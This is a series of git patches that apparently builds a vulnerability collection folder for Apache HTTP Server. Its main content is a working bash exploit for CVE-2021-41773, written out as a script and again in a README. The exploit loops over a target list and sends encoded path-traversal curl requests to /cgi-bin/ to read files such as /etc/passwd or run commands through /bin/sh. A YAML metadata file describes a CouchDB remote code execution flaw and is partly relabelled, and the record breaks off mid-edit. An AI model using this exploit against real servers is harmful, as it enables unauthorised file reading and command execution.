From 4213602c4235c25e5544243bbca7966c0992f7bc Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Wed, 15 Mar 2023 09:15:01 +0000 Subject: [PATCH 01/29] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20apache-HTTP=20Server?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-HTTP Server/.keep diff --git a/cve/apache-HTTP Server/.keep b/cve/apache-HTTP Server/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 38a12e3f8c8f2abe6cbde87eeefe9cce5a30cd51 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Wed, 15 Mar 2023 09:16:12 +0000 Subject: [PATCH 02/29] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-HTTP=20Server/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-HTTP Server/.keep diff --git a/cve/apache-HTTP Server/.keep b/cve/apache-HTTP Server/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 9e96389deecd9afbbaa0fccf68999540a4e00549 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Wed, 15 Mar 2023 09:16:30 +0000 Subject: [PATCH 03/29] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20apache-HTTP=20Server?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-HTTP Server/.keep diff --git a/cve/apache-HTTP Server/.keep b/cve/apache-HTTP Server/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 93b3d1389d339201dc6fa4fd85c09c816adade57 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Wed, 15 Mar 2023 09:29:04 +0000 Subject: [PATCH 04/29] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2021-42013?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/CVE-2021-42013/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-HTTP Server/CVE-2021-42013/.keep diff --git a/cve/apache-HTTP Server/CVE-2021-42013/.keep b/cve/apache-HTTP Server/CVE-2021-42013/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 6f4187bc305d4417e1019018ed2fc79427d7816a Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Wed, 15 Mar 2023 09:29:56 +0000 Subject: [PATCH 05/29] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202021?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-HTTP Server/2021/.keep diff --git a/cve/apache-HTTP Server/2021/.keep b/cve/apache-HTTP Server/2021/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From ea6c8e0de35a545b12b387e5c575cb325d37d044 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Wed, 15 Mar 2023 09:30:06 +0000 Subject: [PATCH 06/29] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-HTTP=20Server/CVE-2021-42013?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/CVE-2021-42013/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-HTTP Server/CVE-2021-42013/.keep diff --git a/cve/apache-HTTP Server/CVE-2021-42013/.keep b/cve/apache-HTTP Server/CVE-2021-42013/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 2ae05ea337a87b5ea52b4b3acd04882bab8989dd Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Wed, 15 Mar 2023 09:30:13 +0000 Subject: [PATCH 07/29] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2021-42013?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/2021/CVE-2021-42013/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-HTTP Server/2021/CVE-2021-42013/.keep diff --git a/cve/apache-HTTP Server/2021/CVE-2021-42013/.keep b/cve/apache-HTTP Server/2021/CVE-2021-42013/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 435232ab39ea7a2083ffdcdb0a1ab9923f646437 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Wed, 15 Mar 2023 09:30:44 +0000 Subject: [PATCH 08/29] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/2021/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-HTTP Server/2021/yaml/.keep diff --git a/cve/apache-HTTP Server/2021/yaml/.keep b/cve/apache-HTTP Server/2021/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From afc9907669e68e28463c514d67cf54c04ada7fec Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Wed, 15 Mar 2023 09:30:58 +0000 Subject: [PATCH 09/29] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-HTTP=20Server/2021/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-HTTP Server/2021/.keep diff --git a/cve/apache-HTTP Server/2021/.keep b/cve/apache-HTTP Server/2021/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 4e9c383a414dbcdd3e79619a20a2e477a8908bae Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Wed, 15 Mar 2023 09:31:09 +0000 Subject: [PATCH 10/29] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-HTTP=20Server/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-HTTP Server/.keep diff --git a/cve/apache-HTTP Server/.keep b/cve/apache-HTTP Server/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From cd532a6f0aaff97b77241eb8ed3dae27f2642f06 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:26:56 +0000 Subject: [PATCH 11/29] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-HTTP=20Server/2021/CVE-2021-42013/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/2021/CVE-2021-42013/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-HTTP Server/2021/CVE-2021-42013/.keep diff --git a/cve/apache-HTTP Server/2021/CVE-2021-42013/.keep b/cve/apache-HTTP Server/2021/CVE-2021-42013/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 3fcc712be0c8f4454bcdfd3408402617478f97a7 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:34:15 +0000 Subject: [PATCH 12/29] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2021-41773?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/2021/CVE-2021-41773/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-HTTP Server/2021/CVE-2021-41773/.keep diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/.keep b/cve/apache-HTTP Server/2021/CVE-2021-41773/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 3f2c2f39c9cd387af1944663a58b9d98b93a979c Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:35:48 +0000 Subject: [PATCH 13/29] poc Signed-off-by: fanyunpeng --- .../2021/CVE-2021-41773/CVE-2021-41773.sh | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 cve/apache-HTTP Server/2021/CVE-2021-41773/CVE-2021-41773.sh diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/CVE-2021-41773.sh b/cve/apache-HTTP Server/2021/CVE-2021-41773/CVE-2021-41773.sh new file mode 100644 index 00000000..2546e270 --- /dev/null +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/CVE-2021-41773.sh @@ -0,0 +1,22 @@ +# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) +# Date: 10/05/2021 +# Exploit Author: Lucas Souza https://lsass.io +# Vendor Homepage: https://apache.org/ +# Version: 2.4.49 +# Tested on: 2.4.49 +# CVE : CVE-2021-41773 +# Credits: Ash Daulton and the cPanel Security Team + +#!/bin/bash + +if [[ $1 == '' ]]; [[ $2 == '' ]]; then +echo Set [TAGET-LIST.TXT] [PATH] [COMMAND] +echo ./PoC.sh targets.txt /etc/passwd +exit +fi +for host in $(cat $1); do +echo $host +curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done + +# PoC.sh targets.txt /etc/passwd +# PoC.sh targets.txt /bin/sh whoami \ No newline at end of file -- Gitee From fe88a3d57229cc98a8333aa73376bf2ce569bf56 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:35:55 +0000 Subject: [PATCH 14/29] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-HTTP=20Server/2021/CVE-2021-41773/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-HTTP Server/2021/CVE-2021-41773/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-HTTP Server/2021/CVE-2021-41773/.keep diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/.keep b/cve/apache-HTTP Server/2021/CVE-2021-41773/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From f2e5ac77cef8389ee1e99d8297f7b4b78ec39488 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:38:18 +0000 Subject: [PATCH 15/29] add cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- .../2021/CVE-2021-41773/README.md | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 cve/apache-HTTP Server/2021/CVE-2021-41773/README.md diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md new file mode 100644 index 00000000..2546e270 --- /dev/null +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md @@ -0,0 +1,22 @@ +# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) +# Date: 10/05/2021 +# Exploit Author: Lucas Souza https://lsass.io +# Vendor Homepage: https://apache.org/ +# Version: 2.4.49 +# Tested on: 2.4.49 +# CVE : CVE-2021-41773 +# Credits: Ash Daulton and the cPanel Security Team + +#!/bin/bash + +if [[ $1 == '' ]]; [[ $2 == '' ]]; then +echo Set [TAGET-LIST.TXT] [PATH] [COMMAND] +echo ./PoC.sh targets.txt /etc/passwd +exit +fi +for host in $(cat $1); do +echo $host +curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done + +# PoC.sh targets.txt /etc/passwd +# PoC.sh targets.txt /bin/sh whoami \ No newline at end of file -- Gitee From 2688f7daaa0e7847d2430e01e3ece5bb9cdc50fd Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:39:49 +0000 Subject: [PATCH 16/29] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- .../2021/CVE-2021-41773/README.md | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md index 2546e270..982a529a 100644 --- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md @@ -1,11 +1,11 @@ -# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) -# Date: 10/05/2021 -# Exploit Author: Lucas Souza https://lsass.io -# Vendor Homepage: https://apache.org/ -# Version: 2.4.49 -# Tested on: 2.4.49 -# CVE : CVE-2021-41773 -# Credits: Ash Daulton and the cPanel Security Team +Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) +Date: 10/05/2021 +Exploit Author: Lucas Souza https://lsass.io +Vendor Homepage: https://apache.org/ +Version: 2.4.49 +Tested on: 2.4.49 +CVE : CVE-2021-41773 +Credits: Ash Daulton and the cPanel Security Team #!/bin/bash -- Gitee From 1dba8a2213f149666fe292d079ccd0798b67ac7c Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:40:35 +0000 Subject: [PATCH 17/29] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- .../2021/CVE-2021-41773/README.md | 27 ++++++++++++++++++- 1 file changed, 26 insertions(+), 1 deletion(-) diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md index 982a529a..0deb5b5f 100644 --- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md @@ -19,4 +19,29 @@ echo $host curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done # PoC.sh targets.txt /etc/passwd -# PoC.sh targets.txt /bin/sh whoami \ No newline at end of file +# PoC.sh targets.txt /bin/sh whoami +Date: 2022-01-21 + +Exploit Author: Konstantin Burov, @_sadshade + +Software Link: https://couchdb.apache.org/ + +Version: 3.2.1 and below + +Tested on: Kali 2021.2 + +Based on 1F98D's Erlang Cookie - Remote Code Execution + +Shodan: port:4369 "name couchdb at" + +CVE: CVE-2022-24706 + +References: + +https://habr.com/ru/post/661195/ + +https://www.exploit-db.com/exploits/49418 + +https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ + +https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce \ No newline at end of file -- Gitee From 88593c465903ceb74accaf90aceaf3923b4fbdf1 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:41:16 +0000 Subject: [PATCH 18/29] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- .../2021/CVE-2021-41773/README.md | 29 ++----------------- 1 file changed, 3 insertions(+), 26 deletions(-) diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md index 0deb5b5f..20e956c4 100644 --- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md @@ -17,31 +17,8 @@ fi for host in $(cat $1); do echo $host curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done +#Usage +PoC.sh targets.txt /etc/passwd +PoC.sh targets.txt /bin/sh whoami -# PoC.sh targets.txt /etc/passwd -# PoC.sh targets.txt /bin/sh whoami -Date: 2022-01-21 -Exploit Author: Konstantin Burov, @_sadshade - -Software Link: https://couchdb.apache.org/ - -Version: 3.2.1 and below - -Tested on: Kali 2021.2 - -Based on 1F98D's Erlang Cookie - Remote Code Execution - -Shodan: port:4369 "name couchdb at" - -CVE: CVE-2022-24706 - -References: - -https://habr.com/ru/post/661195/ - -https://www.exploit-db.com/exploits/49418 - -https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ - -https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce \ No newline at end of file -- Gitee From 4e36553d895c87fc7925380c3a29c3fce9ac8570 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:43:22 +0000 Subject: [PATCH 19/29] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- cve/apache-HTTP Server/2021/CVE-2021-41773/README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md index 20e956c4..40f62d2a 100644 --- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md @@ -1,3 +1,4 @@ +#Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) Date: 10/05/2021 Exploit Author: Lucas Souza https://lsass.io -- Gitee From 9576c0b5b9f20ac30897af7d072c684b19d357d3 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:44:34 +0000 Subject: [PATCH 20/29] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- .../2021/CVE-2021-41773/README.md | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md index 40f62d2a..76e6e842 100644 --- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md @@ -1,12 +1,12 @@ -#Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) -Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) -Date: 10/05/2021 -Exploit Author: Lucas Souza https://lsass.io -Vendor Homepage: https://apache.org/ -Version: 2.4.49 -Tested on: 2.4.49 -CVE : CVE-2021-41773 -Credits: Ash Daulton and the cPanel Security Team +#Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) +Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) +Date: 10/05/2021 +Exploit Author: Lucas Souza https://lsass.io +Vendor Homepage: https://apache.org/ +Version: 2.4.49 +Tested on: 2.4.49 +CVE : CVE-2021-41773 +Credits: Ash Daulton and the cPanel Security Team #!/bin/bash -- Gitee From 69b37a7afa77aaa8a228182447709bc94159552d Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:45:17 +0000 Subject: [PATCH 21/29] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- cve/apache-HTTP Server/2021/CVE-2021-41773/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md index 76e6e842..a66265ee 100644 --- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md @@ -1,4 +1,4 @@ -#Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) +# Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) Date: 10/05/2021 Exploit Author: Lucas Souza https://lsass.io -- Gitee From aae94fd447055ac924d313724da6a93a5ee46642 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:47:10 +0000 Subject: [PATCH 22/29] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- cve/apache-HTTP Server/2021/CVE-2021-41773/README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md index a66265ee..f3ec5ea1 100644 --- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md @@ -7,7 +7,7 @@ Version: 2.4.49 Tested on: 2.4.49 CVE : CVE-2021-41773 Credits: Ash Daulton and the cPanel Security Team - +`` #!/bin/bash if [[ $1 == '' ]]; [[ $2 == '' ]]; then @@ -18,6 +18,7 @@ fi for host in $(cat $1); do echo $host curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done +`` #Usage PoC.sh targets.txt /etc/passwd PoC.sh targets.txt /bin/sh whoami -- Gitee From 2ee7f970e46a45ec383b173ffa489e4c63bf7d70 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:47:31 +0000 Subject: [PATCH 23/29] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- cve/apache-HTTP Server/2021/CVE-2021-41773/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md index f3ec5ea1..b4f2d065 100644 --- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md @@ -19,7 +19,7 @@ for host in $(cat $1); do echo $host curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done `` -#Usage +# Usage PoC.sh targets.txt /etc/passwd PoC.sh targets.txt /bin/sh whoami -- Gitee From 842efb59a95b833e389d0a85f5ccadabe175ab94 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:48:49 +0000 Subject: [PATCH 24/29] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- cve/apache-HTTP Server/2021/CVE-2021-41773/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md index b4f2d065..a60daadb 100644 --- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md @@ -7,7 +7,7 @@ Version: 2.4.49 Tested on: 2.4.49 CVE : CVE-2021-41773 Credits: Ash Daulton and the cPanel Security Team -`` +``` #!/bin/bash if [[ $1 == '' ]]; [[ $2 == '' ]]; then @@ -18,7 +18,7 @@ fi for host in $(cat $1); do echo $host curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done -`` +``` # Usage PoC.sh targets.txt /etc/passwd PoC.sh targets.txt /bin/sh whoami -- Gitee From 5cd7861bf43b7ad30133f10e64dbe0f76affcd93 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:49:51 +0000 Subject: [PATCH 25/29] update cve/apache-HTTP Server/2021/CVE-2021-41773/README.md. Signed-off-by: fanyunpeng --- cve/apache-HTTP Server/2021/CVE-2021-41773/README.md | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md index a60daadb..d4d61313 100644 --- a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md +++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md @@ -20,7 +20,8 @@ echo $host curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done ``` # Usage -PoC.sh targets.txt /etc/passwd -PoC.sh targets.txt /bin/sh whoami - +``` +PoC.sh targets.txt /etc/passwd +PoC.sh targets.txt /bin/sh whoami +``` -- Gitee From 10b19121b5b8a09237a43aedc03f8be872cdb6ac Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:52:38 +0000 Subject: [PATCH 26/29] add cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml. Signed-off-by: fanyunpeng --- .../2021/yaml/CVE-2021-41773.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml diff --git a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml new file mode 100644 index 00000000..50fd5093 --- /dev/null +++ b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml @@ -0,0 +1,32 @@ +id: CVE-2022-24706 +source: https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit +info: + name: Apache CouchDB 是一个面向文档的数据库管理系统。 + severity: critical + description: + 当CouchDB 以集群模式安装时,会开启epmd服务,并且监听相应端口。由于在默认安装过程中Apache CouchDB 将 Erlang Cookie默认设置为 monster,若未经修改,则攻击者可利用该cookie连接epmd,在知道fqdn的情况下执行任意代码,控制服务器。 + scope-of-influence: + apache-CouchDB < 3.2.2 + reference: + - http://packetstormsecurity.com/files/167032/Apache-CouchDB-3.2.1-Remote-Code-... + - http://packetstormsecurity.com/files/169702/Apache-CouchDB-Erlang-Remote-Code... + - http://www.openwall.com/lists/oss-security/2022/04/26/1 + - http://www.openwall.com/lists/oss-security/2022/05/09/1 + - http://www.openwall.com/lists/oss-security/2022/05/09/2 + - http://www.openwall.com/lists/oss-security/2022/05/09/3 + - http://www.openwall.com/lists/oss-security/2022/05/09/4 + - https://docs.couchdb.org/en/3.2.2/setup/cluster.html + - https://lists.apache.org/thread/w24wo0h8nlctfps65txvk0oc5hdcnv00 + - https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-setti... + - https://www.openwall.com/lists/oss-security/2022/04/26/1 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-24706 + cwe-id: CWE-1188 + cnvd-id: None + kve-id: None + tags: + - 不安全的默认资源初始化 + - 弱口令要求 + - 远程代码执行 \ No newline at end of file -- Gitee From 0224658f029cfceb7331377e7549cf89975adec2 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 06:56:12 +0000 Subject: [PATCH 27/29] update cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml. Signed-off-by: fanyunpeng --- cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml index 50fd5093..66d2294f 100644 --- a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml +++ b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml @@ -1,10 +1,10 @@ -id: CVE-2022-24706 -source: https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit +id: CVE-2021-41773 +source: https://www.exploit-db.com/exploits/50383 info: - name: Apache CouchDB 是一个面向文档的数据库管理系统。 + name: Apache HTTPd 是Apache基金会开源的一款HTTP服务器。 severity: critical description: - 当CouchDB 以集群模式安装时,会开启epmd服务,并且监听相应端口。由于在默认安装过程中Apache CouchDB 将 Erlang Cookie默认设置为 